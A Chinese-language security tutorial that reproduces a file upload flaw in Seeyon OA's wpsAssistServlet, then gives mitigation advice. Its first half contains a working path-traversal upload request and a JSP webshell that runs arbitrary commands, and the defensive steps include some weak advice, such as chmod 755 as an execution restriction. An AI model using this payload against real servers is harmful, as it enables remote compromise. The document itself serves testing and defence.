)
实战指南:致远OA wpsAssistServlet文件上传漏洞深度复现与防御策略
第一次听说致远OA系统存在文件上传漏洞时,我正在为客户做安全评估。那是一个普通的周二下午,咖啡杯里还冒着热气,Burp Suite的拦截记录突然跳出一个可疑的请求。正是这次偶然发现,让我意识到这类漏洞在实际渗透测试中的高发性。本文将带您从零开始,完整复现这个可能让企业门户大开的安全隐患。
1. 环境准备与漏洞原理剖析
在开始实际操作前,我们需要理解漏洞的成因。致远OA的wpsAssistServlet接口在设计时未对文件上传路径进行严格校验,导致攻击者可以通过目录遍历手段(如../../)将恶意文件上传到Web可访问目录。这种漏洞属于典型的"任意文件上传"类型,在OWASP Top 10中长期占据重要位置。
实验环境需求清单:
- 致远OA V8.1SP1测试环境(虚拟机隔离)
- Burp Suite Community/Professional版
- 浏览器(推荐Chrome或Firefox)
- 基础文本编辑器(Notepad++或VS Code)
注意:所有测试必须在授权环境下进行,未经授权的渗透测试可能涉及法律风险
漏洞利用的核心在于构造特殊的HTTP请求包,关键在于三个参数:
flag=save:触发文件保存功能realFileType:通过路径遍历突破目录限制fileId:文件标识符(任意数字即可)
2. 分步漏洞复现过程
2.1 Burp Suite拦截与请求修改
启动Burp Suite后,按F12打开浏览器开发者工具,清空缓存确保获取最新请求。访问致远OA登录页面时,Burp的Proxy模块应显示如下基础请求:
GET /seeyon/main.do HTTP/1.1 Host: test.oa.com User-Agent: Mozilla/5.0 Accept: text/html接下来我们需要手动构造恶意上传请求。以下是经过验证的有效POC(Proof of Concept):
POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/shell.jsp&fileId=2 HTTP/1.1 Host: vulnerable.oa.com Content-Length: 289 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123 ----WebKitFormBoundaryABC123 Content-Disposition: form-data; name="upload"; filename="test.txt" Content-Type: text/plain <% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } %> ----WebKitFormBoundaryABC123--常见错误及解决方案:
- 错误1:返回404状态码
- 检查OA版本是否在受影响范围
- 确认路径
/seeyon/wpsAssistServlet存在
- 错误2:上传成功但无法解析
- 确保文件扩展名为.jsp
- 检查上传路径是否可web访问
2.2 漏洞验证与利用
成功上传webshell后,访问http://target.oa.com/shell.jsp?cmd=whoami应当能看到服务器当前用户信息。为降低风险,建议使用无害的验证命令如echo 123。
下表对比了不同致远OA版本的受影响情况:
| 产品线 | 受影响版本 | 默认上传路径 |
|---|---|---|
| A6系列 | V8.0SP2-V8.1SP1 | /seeyon/webapps/ROOT/ |
| A8系列 | V8.1SP1 | /ApacheJetspeed/webapps/ROOT/ |
| G6系列 | V8.1 | /seeyon/webapps/ROOT/ |
3. 深度防御方案
3.1 临时缓解措施
对于无法立即升级的系统,建议实施以下防护:
- WAF规则:添加针对
wpsAssistServlet的异常请求检测location ~* /seeyon/wpsAssistServlet { if ($args ~* "\.\.") { return 403; } } - 文件系统权限:限制web目录执行权限
chmod -R 755 /seeyon/webapps/ chown -R www-data:www-data /seeyon/webapps/
3.2 长期加固建议
- 定期更新致远OA官方补丁
- 实施最小权限原则,限制服务器账户权限
- 部署RASP(运行时应用自我保护)方案
- 建立文件上传白名单机制
4. 企业级安全防护体系
在真实企业环境中,单一漏洞的修复远远不够。建议建立纵深防御体系:
边界防护层:
- 下一代防火墙策略优化
- 网络流量异常检测
应用防护层:
- 定期代码审计
- 自动化漏洞扫描
主机防护层:
- 文件完整性监控
- 特权账户管理
在一次为客户做的红队演练中,我们发现即使修补了这个漏洞,攻击者仍可能通过其他接口实现突破。安全防护就像城堡防御,需要多层次的协同保护。
